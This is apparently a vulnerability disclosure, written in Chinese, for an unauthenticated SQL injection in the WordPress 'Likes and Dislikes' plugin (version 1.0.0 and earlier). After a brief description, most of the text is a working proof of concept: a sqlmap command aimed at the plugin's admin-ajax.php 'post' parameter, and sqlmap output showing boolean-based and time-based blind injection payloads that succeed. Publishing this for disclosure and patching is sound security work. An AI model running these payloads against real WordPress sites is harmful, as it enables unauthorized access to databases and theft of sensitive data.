Likes and Dislikes 插件 <= 1.0.0 - 未认证 SQL 注入
WordPress 的 Likes and Dislikes 插件在所有版本(包括 1.0.0)中,由于对用户提供的 'post' 参数转义不足,并且对现有 SQL 查询缺乏充分准备,导致存在 SQL 注入漏洞。这使得未经认证的攻击者能够将额外的 SQL 查询附加到已有查询中,从而提取数据库中的敏感信息。
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
sqlmap identified the following injection point(s) with a total of 372 HTTP(s) requests:
---
Parameter: post (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---